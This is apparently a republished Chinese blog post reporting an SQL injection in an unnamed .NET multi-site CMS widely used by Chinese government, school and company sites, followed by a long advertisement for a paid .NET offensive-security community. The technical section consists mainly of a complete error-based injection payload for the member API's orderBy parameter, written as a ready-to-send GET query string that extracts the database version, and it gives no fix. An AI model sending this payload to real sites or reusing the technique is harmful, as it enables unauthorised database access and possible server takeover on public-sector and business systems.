0x01 应用介绍
某CMS是.NET开发的一款支持多分站、多语种,集成内容发布、信息发布、自定义表单、自定义模型、会员系统、业务管理等功能于一体的独立网站管理系统,支持MSSQL Server数据库。用户可以下载安装使用,系统于2008年正式发布,目前全国用户已经超过50万以上,被广泛用于全国各级政府、学校和企业的网站搭建,具有简单易用、强大灵活等特点。
0x02 漏洞复现
该系统的会员模块对用户提交的文章参数没有进行充分的过滤,导致SQL注入,如果采用的是MSSQL Server数据库,则有可能直接获取数据库服务器系统权限。
某个包含名为member的API接口存在注入漏洞,当请求为GET时触发该API运行,注入参数为orderBy,发送id+desc)[_rownumber],[article].[Id],[article].[ColumnId],[article].[State],[article].[IsGood],[article].[IsHot],[article].[IsTop],[article].[IsOnline],[article].[IsExpire],[article].[PublishFrom],[article].[HasThumbnail],[article].[IsSubColumnData],[article].[Uid],[article].[Username],[article].[Clicks],[article].[Ip],[article].[Title],[article].[Thedate]from[article])[_newtable]where[_newtable].[_rownumber]+between+1+and+10and+1=(select+@@version)–,可以报错注入当前的数据库版本,具体如下Payload。
?table=article&state=1&columnId=4239&searchAttr=&orderBy=id+desc)[_rownumber],[article].[Id],[article].[ColumnId],[article].[State],[article].[IsGood],[article].[IsHot],[article].[IsTop],[article].[IsOnline],[article].[IsExpire],[article].[PublishFrom],[article].[HasThumbnail],[article].[IsSubColumnData],[article].[Uid],[article].[Username],[article].[Clicks],[article].[Ip],[article].[Title],[article].[Thedate]from[article])[_newtable]where[_newtable].[_rownumber]+between+1+and+10and+1=(select+@@version)--&searchField=thedate&searchDateRange=&searchKeyword=&PageSize=10&CurrentPage=1&PageCount=0&RecordCount=0&_=1704699710036
有关漏洞详情和具体复现的方法已发表于星球,师傅们可自行查阅资料。
0x03 欢迎加入知识库
为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。只需199元就可以加入我们。
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
我们还有一个会员专属的星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。
原文链接:https://blog.csdn.net/ahhacker86/article/details/137784019?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171852222916800182181803%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=171852222916800182181803&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-2-137784019-null-null.nonecase&utm_term=cms%E4%B8%BB%E9%A2%98
